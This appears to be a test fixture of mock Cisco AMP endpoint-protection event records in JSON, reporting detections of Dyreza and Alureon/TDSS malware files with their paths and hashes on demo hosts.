+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257641317138000,"timestamp":1610705522,"timestamp_nanoseconds":236000000,"date":"2021-01-15T10:12:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257641317138497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":641000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667317698527247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257589777531000,"timestamp":1610705510,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:11:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257589777530944","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257564007727000,"timestamp":1610705504,"timestamp_nanoseconds":218000000,"date":"2021-01-15T10:11:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257564007727167","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257512468120000,"timestamp":1610705492,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:11:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257512468119614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257460928512000,"timestamp":1610705480,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:11:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257460928512061","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789131","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"5A.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":156000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"57.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\57.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Alureon:Olmarik-tpd","detection_id":"5825617812646789128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"58.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\58.tmp","identity":{"sha256":"34e2a286618a82905957c64397999e2d38092ff6b7c0c21192760376c9036f1a","sha1":"d8e5ded034afbb77ca3759e35dd0f200255a6fd5","md5":"1ef0e0c765da7f727e1eb8ff38d02ff1"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":78000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789127","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"59.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821829","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"56.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\56.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821827","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821828","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821826","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257413683872000,"timestamp":1610705469,"timestamp_nanoseconds":56000000,"date":"2021-01-15T10:11:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257409388904508","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900267000300,"timestamp":1610705459,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:10:59+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Eldorado:Alureon-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705459,"start_date":"2021-01-15T10:10:59+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257357849297000,"timestamp":1610705456,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:10:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257357849296955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} 